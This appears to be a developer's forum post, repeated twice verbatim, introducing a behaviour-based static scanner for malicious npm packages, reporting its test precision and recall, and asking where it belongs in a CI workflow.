Over the past year several major npm supply chain incidents had no CVE. They were intentionally malicious packages, not vulnerable ones, so database driven scanners passed them clean.
That raised a question for me. If zero day supply chain malware is not vulnerable software, what does it actually look like at the code level?
I built a scanner that analyzes published npm tarballs directly and looks for correlated behavioral signals rather than known advisories. Things like secret file access combined with outbound network calls, install hooks invoking shell execution together with obfuscation, or sudden behavior drift between versions.
In testing across 11,356 real packages this approach reached 99.95 percent precision and 99.44 percent recall with four false positives in roughly 3,000 clean packages. The analysis is deterministic static inspection with no LLM involved.
It runs as a CLI or GitHub Action and only triggers when package.json or package-lock.json changes, so it can be used as a dependency intake check rather than gating every merge.
Would appreciate feedback from people running production Node systems, especially around where you would place this in your CI workflow.
Over the past year several major npm supply chain incidents had no CVE. They were intentionally malicious packages, not vulnerable ones, so database driven scanners passed them clean.
That raised a question for me. If zero day supply chain malware is not vulnerable software, what does it actually look like at the code level?
I built a scanner that analyzes published npm tarballs directly and looks for correlated behavioral signals rather than known advisories. Things like secret file access combined with outbound network calls, install hooks invoking shell execution together with obfuscation, or sudden behavior drift between versions.
In testing across 11,356 real packages this approach reached 99.95 percent precision and 99.44 percent recall with four false positives in roughly 3,000 clean packages. The analysis is deterministic static inspection with no LLM involved.
It runs as a CLI or GitHub Action and only triggers when package.json or package-lock.json changes, so it can be used as a dependency intake check rather than gating every merge.
Would appreciate feedback from people running production Node systems, especially around where you would place this in your CI workflow.